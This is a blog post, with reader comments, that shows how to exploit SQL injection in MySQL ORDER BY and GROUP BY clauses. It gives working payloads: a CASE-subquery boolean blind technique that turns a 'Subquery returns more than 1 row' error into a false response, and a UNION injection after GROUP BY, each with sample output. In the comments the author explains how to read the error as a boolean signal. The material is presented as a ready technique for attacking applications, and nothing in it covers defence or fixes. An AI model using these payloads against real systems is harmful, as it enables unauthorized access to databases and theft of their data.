Injection in Order by, Group by Clause

Exploiting SQL Injections when the input goes in the order by clause, is a bit tricky as after 'order by' clause union queries are not permitted. The following could be used in such scenario to form blind sql injection cases:

mysql> select id from news where id =1 order by 1, (select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1;

+——+

| id   |

+——+

|    1 | 

+——+

1 row in set (0.00 sec)

—-

mysql> select id from news where id =1 order by 1, (select case when (1=2) then 1 else 1*(select table_name from information_schema.tables)end)=1;

ERROR 1242 (21000): Subquery returns more than 1 row

—–

For injections where user's input goes to the group by clause, union queries can be used although the above technique will also work for blind injection examples:  mysql> select id from news where id =1 group by id union select 2222;

+——+

| id   |

+——+

|    1 |

| 2222 | 

+——+

2 rows in set (0.00 sec) 

6 Thoughts on “Injection in Order by, Group by Clause

  1. Great. Thats exactly what I was searching for.
    Not so great: I do not understand what the example should do…

  2. what version of the mysql are you trying this?

    I think this doesnot work in some of the recent versions

  3. Server Version: 5.1.30
    I meant especially the “order by”-case.
    What happens is exactly the shown reaction. What does that error tell me (regarding the injection)?

  4. This is how, you can convert this into standard true and false responses. Think of that error as a ‘false’ response which you get when doing boolean injection;

    e.g. id=100 and 1=1; id=100 and 1=2;

    —-

  5. of course -.-’
    Thank you.

  6. GDSG on July 8, 2010 at 2:17 am said:

    THANKS MAN!!!
    I try to figure this out about 2 days, cuz IF(1=1,1,1) not worked, but this ROCKS.

    Thanks Again!

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Post Navigation